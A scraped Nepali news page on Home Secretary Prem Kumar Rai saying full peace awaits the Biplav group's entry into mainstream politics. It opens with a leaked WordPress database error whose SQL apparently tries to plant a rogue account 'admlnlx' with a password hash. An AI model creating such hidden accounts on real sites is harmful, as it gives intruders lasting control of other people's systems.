WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqeQm2zwT0D2lJzZDhvXh5fvfX7ovV/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 20:04:47', '', 'admlnlx', 'admlnlx')

देशमा पूर्ण शान्ति छैन: गृह सचिब प्रेम कुमार राई – Gaule Khabar

देशमा पूर्ण शान्ति छैन: गृह सचिब प्रेम कुमार राई

देशमा पूर्ण शान्ति छैन: गृह सचिब प्रेम कुमार राई

गाउँले न्युज, ७ साउन, काठमाडौं । गृह मन्त्रालयले देशको शान्ति सुरक्षाको अवस्था सुधारोन्मुख रहेको दाबी गरेको छ । विप्लव समूह मूलधारमा आएपछि मात्र पूर्ण शान्ति कायम हुने गृह सचिब प्रेम कुमार राईले बताए ।
आज (मंगलबार) मन्त्रालयमा आयोजित पत्रकार सम्मेलनमा बोल्दै गृह सचिव प्रेमकुमार राईले भने हामीले विगतभन्दा बेटर मात्र भनेका छौं । पूर्ण शान्ति बनाउन भूमिका खेल्नुपर्छ । विप्लव समूहहरु जब मूलधारमा आउनुहुन्छ तब मात्र शान्ति सुरक्षाले पूर्णता पाउँछ । हामी त्यसतर्फ लागिरहेका छौं ।
अध्यागमन क्षेत्रमा पनि विगतभन्दा धेरै सुध्रिएको दाबी साथै नेपाल प्रहरी र सशस्त्र प्रहरीबीच विमती पनि नरहेको सचिव राईले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका